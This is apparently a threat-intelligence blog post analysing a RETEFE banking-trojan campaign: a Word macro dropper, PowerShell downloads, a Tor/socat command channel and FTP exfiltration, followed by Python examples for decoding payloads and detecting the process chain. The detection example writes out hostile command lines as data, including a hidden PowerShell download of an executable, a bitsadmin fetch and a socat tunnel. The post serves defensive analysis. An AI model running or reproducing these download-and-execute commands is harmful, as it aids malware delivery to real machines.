During the first week of October 2017, RSA FirstWatch identified a Malspam campaign targeting Swiss industry with malicious MS Word documents carrying the RETEFE Banking Trojan.
Much of Europe has been routinely targeted by these actors for the last several months, and there is little sign of the RETEFE campaign letting up, as evident in numerous VirusTotal submissions of recent dropper documents:
These dropper hashes all correspond to German-language MS Word documents with varying properties that are essentially the same W97M/Downloader; the malicious code is located in identical VBA macros. Upon submitting one of the MS Word delivery documents to RSA's pre-release WhatsThisFile service, we are immediately greeted with a threat score of 100. (Note: the underlying VBA code streams in each of these Office documents are identical. The malware author attempted to avoid detection by changing file properties (e.g., Author) on each document. This resulted in unique file hashes for each document, but the resulting codeset remained the same.)
Below are snapshots from our Cuckoo detonation (of one of the dropper documents) and the corresponding network traffic as seen by RSA NetWitness, both of which we'll walk through to show how the malicious code delivers a successful RETEFE infection. (Note: the entire PCAP from our sandbox is available at GitHub - netwitness/retefe: retefe banking trojan.)
As the document is first opened, the embedded VBA code is automatically run via a Document_Open() subroutine contained in the ThisDocument VBA stream, as shown below.
The Document_Open() subroutine begins a long series of de-obfuscation steps which ultimately yields a base-64 encoded payload as shown below.
This payload is base-64 decoded in order to obtain the second stage of the dropper attack as shown pasted below.
This stage of the attack utilizes PowerShell to launch a hidden window, which attempts to download malware from each of 5 sites specified in the payload. This payload is launched via the VBA.Shell() command in the f9TZtz1 VBA code stream, as shown in the following two WhatsThisFile screenshots.
NetWitness Endpoint (as shown in the steps and annotated in the graphic below) easily follows this behavior.
1. This begins with the launching of the .doc file from Internet Explorer, which calls Microsoft Word.
2. Once 'Enable Content' is clicked, WINWORD.exe calls PowerShell to retrieve content from a few different websites and save it as 65536.exe.
3. PowerShell creates a process from the downloaded content as 65536.exe.
5. Next, wscript writes a .ps1 (PowerShell) script.
6. Wscript then calls PowerShell to launch the newly created VHSjWECxz.ps1 file. We also see PowerShell writing the 7za.exe file.
NetWitness Packets observes the first four download attempts fail (via 404) and catches the successful download of 'wluheol.exe', the actual RETEFE payload, from thomasamericalatina[.]net hosted at 190.0.230[.]91, under a Costa Rica-based domain name and web-hosting service, Cyberfuel[.]com.
Below is a Maltego snapshot of the numerous attempted (failed and successful) RETEFE delivery domains with some basic passive DNS enrichment.
Decodes to this fun registry key:
Here are some other strings that are base64 encoded in the payload:
taskkill /F /im firefox.exe
taskkill /F /im chrome.exe
The largest of all base64 payloads is in the last sequenced file in the zip (js-decoded-4.js), which contains the base64-decoded blob found in stage 3 (js-decoded-3.js). It is also rife with artifacts, but is too big to paste here. A zip (password 'infected') of all the decoded payloads has been posted to FirstWatch's public GitHub repo at GitHub - netwitness/retefe: retefe banking trojan.
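As an added illustration of the base64 decoding applied to the dropper payload and to the encoded strings listed above (example code written for this post, not the RETEFE sample's own code or RSA's tooling), the following Python carves base64 tokens out of a decoded script stage and keeps only those that decode to readable text, including the UTF-16LE form PowerShell's -EncodedCommand expects. The stage it scans is a constructed stand-in, not the real js-decoded-4.js.

```python
import base64
import re

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}

def _readable(data: bytes) -> bool:
    return bool(data) and all(b in PRINTABLE for b in data)

def decode_candidate(token: str):
    """Return (encoding, text) if token base64-decodes to readable text, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:          # bad alphabet or padding: not real base64
        return None
    # PowerShell -EncodedCommand payloads are UTF-16LE: every odd byte is NUL
    if len(raw) >= 4 and len(raw) % 2 == 0 and not any(raw[1::2]) and _readable(raw[0::2]):
        return ("utf-16le", raw.decode("utf-16le"))
    if _readable(raw):
        return ("ascii", raw.decode("ascii"))
    return None                 # binary blob (e.g. an embedded PE or archive)

def carve_strings(script: str):
    """Scan a decoded JS/PowerShell stage and return every readable base64 payload, in order."""
    hits = [decode_candidate(m.group(0)) for m in B64_TOKEN.finditer(script)]
    return [h for h in hits if h is not None]

def _b64(text: str, enc: str = "ascii") -> str:
    return base64.b64encode(text.encode(enc)).decode()

# Constructed stand-in for a decoded dropper stage (not the real js-decoded-4.js);
# the first two strings are the taskkill commands listed in the post.
SAMPLE_STAGE = (
    'var k1 = "' + _b64("taskkill /F /im firefox.exe") + '";\n'
    'var k2 = "' + _b64("taskkill /F /im chrome.exe") + '";\n'
    'var pc = "' + _b64("Stop-Process -Name iexplore -Force", "utf-16le") + '";\n'
    'var id = "0123456789abcdef0123456789abcdef";\n'   # valid alphabet, but decodes to binary
)

if __name__ == "__main__":
    for enc, text in carve_strings(SAMPLE_STAGE):
        print(f"[{enc}] {text}")
```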
During the execution of the malware (as described above), we begin to see some known characteristics and behaviors associated with RETEFE. The download of Tor and socat are our first keys.
Tor with socat (acting as a proxy) is quickly put to use as the malware establishes command and control (c2) via a number of tor relays, as observed in the highlighted traffic below over ports 9001 and 443.
Again NetWitness Endpoint demonstrates its utility here (as annotated in the steps and graphic below).
8. PowerShell is called upon again, which launches cmd.exe. This time, it runs bitsadmin to download the Tor client.
9. EXE is called upon to extract the downloaded TOR content into the "C:\Users\analyst\AppData\Roaming\Identities" directory.
10. Next, mshta.exe is called to launch the TOR process.
11. We next see 7za.exe extracting more content into the “Identities” directory after another powershell script was run.
12. Here, we can see the malicious code launch 'socat.exe' and start a SOCKS tunnel to a Tor node on ports 5555 and 5588. It also stops any running Chrome, Firefox or Internet Explorer browsers.
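To turn the endpoint steps above into something a detection engineer can test, here is an added Python example (written for this post, not NetWitness Endpoint's own logic) that applies parent/child and command-line rules for the chain just described to a constructed set of process events. The process ids, URLs and the .onion placeholder are assumptions; the Identities directory, 65536.exe, bitsadmin, mshta, socat and the port numbers come from the post.

```python
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")
IDENT = r"C:\Users\analyst\AppData\Roaming\Identities"

# Constructed process events mirroring the chain described in the post
# (not real telemetry from the sandbox run; pids, URLs and the .onion host are placeholders).
EVENTS = [
    Event(50, 1, "explorer.exe", "explorer.exe"),
    Event(60, 50, "powershell.exe", "powershell.exe -c Get-Date"),   # benign admin use
    Event(100, 1, "iexplore.exe", "iexplore.exe"),
    Event(200, 100, "WINWORD.EXE", "WINWORD.EXE /n Rechnung.doc"),
    Event(300, 200, "powershell.exe", "powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/x','65536.exe')"),
    Event(700, 300, "cmd.exe", "cmd.exe /c bitsadmin /transfer j /download http://example.invalid/tor.zip " + IDENT + r"\tor.zip"),
    Event(800, 700, "bitsadmin.exe", "bitsadmin /transfer j /download http://example.invalid/tor.zip " + IDENT + r"\tor.zip"),
    Event(900, 300, "mshta.exe", "mshta.exe " + IDENT + r"\run.hta"),
    Event(1000, 900, "tor.exe", IDENT + r"\tor.exe"),
    Event(1100, 300, "socat.exe", "socat.exe TCP4-LISTEN:5555,fork SOCKS4A:127.0.0.1:ONION-PLACEHOLDER:443,socksport=9050"),
    Event(1200, 300, "taskkill.exe", "taskkill /F /im firefox.exe"),
]

# (rule name, parent image regex or None, image regex, command-line regex or None)
RULES = [
    ("office_spawns_powershell", r"winword|excel", r"^powershell\.exe$", None),
    ("bitsadmin_download", None, r"^bitsadmin\.exe$", r"/transfer"),
    ("mshta_launches_tor", r"^mshta\.exe$", r"^tor\.exe$", None),
    ("socat_socks_tunnel", None, r"^socat\.exe$", r"LISTEN:(5555|5588).*SOCKS"),
    ("browser_kill", None, r"^taskkill\.exe$", r"/im\s+(firefox|chrome|iexplore)\.exe"),
]

def _match(events, ev, rule):
    _, parent_re, image_re, cmd_re = rule
    parent = next((e for e in events if e.pid == ev.ppid), None)
    return (re.search(image_re, ev.image, re.I) is not None
            and (cmd_re is None or re.search(cmd_re, ev.cmdline, re.I) is not None)
            and (parent_re is None or (parent is not None and re.search(parent_re, parent.image, re.I) is not None)))

def detect(events):
    """Return (rule name, pid) for every event matching a RETEFE chain rule, in event order."""
    return [(r[0], ev.pid) for ev in events for r in RULES if _match(events, ev, r)]

def ancestry(events, pid):
    """Render the process ancestry of pid, child first, for the analyst's report."""
    by_pid, chain = {e.pid: e for e in events}, []
    while pid in by_pid and len(chain) < 32:      # depth guard against cyclic pid reuse
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return " <- ".join(chain)
```

Each rule on its own is noisy in a real estate; the value is in seeing several fire under one Word-rooted ancestry, which is why ancestry() is reported alongside the hits.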
In addition to the Tor connections, the malware also employs an alternative exfiltration method via FTP to a server hosted on world4you[.]com. SALES05.log is the exfiltrated file, whose name is based on the infected machine's name, in this case 'SALES05'.
This exfiltration is done via the J/S payload in the zip file at the end of 'wluheol.exe', where several lines of code in the last J/S file provide some insight into exactly what is being exfiltrated in this log file.
It is believed that the actors are/were leveraging the compromised site below to access this FTP exfiltration.
As the infection persists over the course of many hours, we also observed heavy periodic beaconing in NetWitness Packets.
Thanks to Christopher Ahearn, Kent Backman, firstname.lastname@example.org, and Ahmed Sonbol for their contributions to this research. All related Indicators of Compromise (IOCs) have been added to the FirstWatch C2 Domain and C2 IPs feeds and are available in RSA Live.
RETEFE Delivery domains:
RETEFE Payload hash:
RETEFE C2 domains (Tor relays):
Alternative exfil domain: